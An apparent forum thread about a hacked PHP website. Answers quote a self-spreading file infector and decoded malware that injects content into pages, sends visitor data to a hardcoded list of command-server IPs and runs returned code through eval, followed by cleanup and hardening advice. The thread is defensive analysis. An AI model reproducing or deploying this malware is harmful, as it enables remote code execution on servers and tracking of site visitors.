while (($file = @readdir($odir)) !== FALSE) {
if ($file == '.' || $file == '..') {
continue;
} else {
echo '. ';
if (
get_file_extension($file) == 'php') {
modify($dir.DIRECTORY_SEPARATOR.$file);
}
}
if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
$deep++;
dir_num($dir.DIRECTORY_SEPARATOR.$file);
$deep--;
}
}@closedir($odir);
}
Echo 'Wait please...<br>';
$dir = dirname(__FILE__);
dir_num($dir);
echo '<script>window.location.reload();</script>';
exit();
this part of the script tries to find other php
files in the current and subdirectories and infects them.
source to share
I would say remove all such fragments, change all your passwords, and if possible, disable your site until support returns to you. Of course it looks like it's bad, after some digging around the code and decoding I found this:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
}return $buf;
}function opanki($buf){
$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
} else {$contents = mod_con($buf);
}$len = strlen($contents);header("Content-Length: ".$len);return($contents);
} function GetMama(){
$mother = "www.99bits.com";return $mother;
}ob_start("opanki");function ahfudflfzdhfhs($pa){
$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";
}if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
} else {$ua = "";
}if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";
}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
} if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;
}
}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
source to share
Based on a security background, I'm pretty sure your webserver has been hacked. To begin with, it is usually a good idea to investigate the source to avoid repeating this error.
To start:
- Find the first files infected via timestamps.
- Log active startup scripts to determine what is causing this, or errors in your PHP logs, etc.
If you are using shared hosting you cannot do this, shared hosting users are generally more vulnerable to hacking, but if you are on a VPS or better you can contact your host in case of managed hosting for full format or required security ...
However, the fact is that deleting these fragments will not be used 99.99% of the time, this will not prevent an attacker in the future. Changing passwords helps, but again, it's not a solid solution.
If you have the resources, hire a security professional to conduct a quick audit. There are many that only require payment if they find weakness. If not, then reevaluate the potential weaknesses on your server. See this section for Linux servers (http://www.thegeekstuff.com/2011/03/apache-hardening). If you are using Windows please let me know, I will link you to several for Windows IIS.
Glad I could help!
source to share